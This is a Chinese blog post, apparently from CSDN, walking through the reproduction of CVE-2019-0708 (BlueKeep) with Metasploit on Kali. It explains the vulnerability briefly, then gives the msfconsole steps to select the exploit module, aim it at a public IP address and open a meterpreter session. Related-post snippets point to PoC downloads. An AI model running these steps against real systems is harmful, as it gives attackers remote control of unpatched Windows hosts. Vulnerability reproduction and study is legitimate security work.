Kali--MSF（CVE-2019-0708漏洞复现）

慕容天成

于 2024-08-25 00:38:39 发布

阅读量382

点赞数 4

文章标签： web安全

本文链接：https://blog.csdn.net/weixin_53946822/article/details/141507694

版权

一、概要

CVE-2019-0708漏洞是通过检查用户的身份认证，导致可以绕过认证，不用任何的交互，直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。

二、原理

存在漏洞的远程桌面服务器，在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体，但并未将指向该结构体的指针删除，而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针，若攻击者可通过远程发送数据重新占据被释放的 MS_T120，并为结构体内的函数指针赋恰当的值，即可实现远程命令执行。

三、影响版本

Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows Server 2003
Windows XP

四、复现过程（CVE-2019-0708漏洞复现）

msfconsole
search cve-2019-0708
use 0
show options 
set RHOSTS 54.191.138.128
run


sessions       #查看上钩的用户
sessions -i 1  #选择需要攻击的用户，这里选择第 1 个

出现meterpreter你就已经成功的入侵的对方的电脑

`meterpreter命令：`

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

慕容天成

关注关注

4
点赞
踩
9

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

[系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及防御详解

杨秀璋的专栏

12-27

1万+

娜璋AI安全之家于2020年8月18日开通，将专注于Python和安全技术，主要分享Web渗透、系统安全、CVE复现、威胁情报分析、人工智能、大数据分析、恶意代码检测等文章。真心想把自己近十年的所学所做所感分享出来，与大家一起进步。系统安全系列作者将深入研究恶意样本分析、逆向分析、漏洞利用、攻防实战等，通过在线笔记和实践操作的形式分享与博友们学习。前文通过编写程序实现获取Windows系统目录文件，并对其进行加密和解密的过程。这篇文章将详细介绍Windows远程桌面服务漏洞（CVE-2019-0708），

CVE-2019-0708 漏洞复现

qq_40860153的博客

05-11

807

存在漏洞的远程桌面服务器，在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体，但并未将指向该结构体的指针删除，而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针，若攻击者可通过远程发送数据重新占据被释放的 MS_T120，并为结构体内的函数指针赋恰当的值，即可实现远程命令执行。4、可以看到攻击完成，但是没有成功创建会话，通过分析告警提示，是需要指定一下目标攻击框架，这里再设置一下攻击框架，再发起攻击就可以成功获取到会话了。攻击机：192.168.0.1。

参与评论您还未登录，请先登录后发表或查看评论

如何正确的远程控制windows sever桌面，msf拿到cmd后运行程序出现“交互式服务检测”解决方案

qq_62931346的博客

07-13

250

利用永恒之蓝拿到windowsshell后尝试执行某些功能，但是多次尝试均发现windows任务栏会出现一个名为"交互式服务检测"的窗口，我们执行的命令(如弹计算器)均会在该窗口内的桌面执行。找到目录为Administrator(当前登陆用户名)的进程，记下进程id。拿到的shell所在进程的pid和当前win桌面进程的pid不相同。再次尝试执行进程(弹计算器)

CVE-2019-0708漏洞复现

lx1315998513的博客

09-26

1942

CVE-2019-0708漏洞复现CVE-2019-0708背景影响系统测试环境更新kali linux更新msf下载cve_2019_0708模块查看msf安装的路径拷贝模块漏洞复现远程登陆更改用户密码，并进行远程登陆。登陆 CVE-2019-0708背景 Windows系列服务器于2019年5月15号，被爆出高危漏洞，该漏洞影响范围较广，漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻...

最详细利用kali的msf进行CVE-2019-0708漏洞复现

最新发布

杨秀璋的专栏

07-10

666

这是作者新开的一个专栏——“漏洞挖掘与防护”。第一篇文章将详细介绍Windows远程桌面服务漏洞（CVE-2019-0708），该高危漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击，堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持，感恩安全路上一路前行，如果有写得不好的地方，可以联系我修改。基础性文章，希望对您有所帮助！

360公司_RDP漏洞[ CVE-2019-0708 ]无损扫描工具(3)(1).rar

06-03

0708detector.exe　程序是360公司的360Vulcan Team发布的一款针对编号为CVE-2019-0708的Windows远程桌面协议漏洞的检测程序,原则上该扫描程序不会造成目标系统出现蓝屏,请您测试后再使用。目前程序只支持单个IP的扫描,您可以自行构造出批量扫描的程序，谢谢。

"蠕虫级"的高危远程漏洞CVE-2019-0708工具一个直接不重启修补一个检测.zip

05-24

与黑客争分夺秒，亲测可用RDP远程漏洞热补丁工具，官网正品资源

cve-2019-0708-poc-exp.zip

05-20

从github 上搞到的，测试主机：win10，python。目标：win7，2008 都测试通过了。 cve-2019-0708.1.py IP地址即可。啥东西不多说

CVE-2019-0708（远程桌面）漏洞复现

weixin_43806577的博客

08-26

5545

一、CVE-2019-0708漏洞简介 CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞，只要开启Windows远程桌面服务（RDP服务）即可被攻击。二、测试环境 Kali虚拟机、Windows Server 2008 R2 64位（Windows服务器需开启远程桌面服务）、windows 7 64位（开启远程桌面服务）三、测试过程（1）查看IP Kali的IP地址为1...

CVE 2019-0708 漏洞复现

n5xxxx__zy的博客

07-11

482

0x00 环境要求被攻击机环境：win7 64位需要开启3389 (远程桌面设置允许),关闭防火墙攻击机环境：python3 0x01 下载POC Gayhub 找到CVE2019-0708 找到poc git clone https://github.com/n1xbyte/CVE-2019-0708.git//对其poc进行git clone 0x02开...

cve-2019-0708漏洞复现

yeshankuangrenaaaaa的博客

07-23

6102

CVE-2019-0708漏洞复现记录测试：Iron Date:2020-06-24 远程执行代码漏洞的攻击文章目录CVE-2019-0708漏洞复现记录漏洞描述漏洞复现复现环境说明检验靶机环境是否满足攻击条件kali-操作判断靶机的漏洞是否可利用进行攻击重试漏洞应对方案打补丁缓解变通方法参考链接变通方法参考链接漏洞描述远程桌面服务远程执行代码漏洞当未经身份验证的攻击者使用RDP连接到目标系统并发送经特殊设计的请求时，远程桌面服务中存在远程执行代码漏洞。此漏洞是预身份验证，无需用户交互。成功利

CVE-2019-0708（远程桌面服务RCE）漏洞复现（超详细Getshell）

unlash的博客

10-28

6107

CVE-2019-0708（远程桌面服务RCE）漏洞复现（超详细Getshell）漏洞介绍漏洞修复复现条件

【漏洞复现】CVE-2019-0708（BlueKeep）

weixin_45632448的博客

06-14

3759

2019年5月14日微软官方发布安全补丁，修复了 Windows 远程桌面服务的远程代码执行漏洞，该漏洞影响了某些旧版本的 Windows 系统。此漏洞是预身份验证，无需用户交互，这就意味着这个漏洞可以通过网络蠕虫的方式被利用，与2017年 WannaCry 勒索病毒的传播方式类似。存在漏洞的远程桌面服务器，在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体，但并未将指向该结构体的指针删除，而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针，若攻击者可通过远程发送数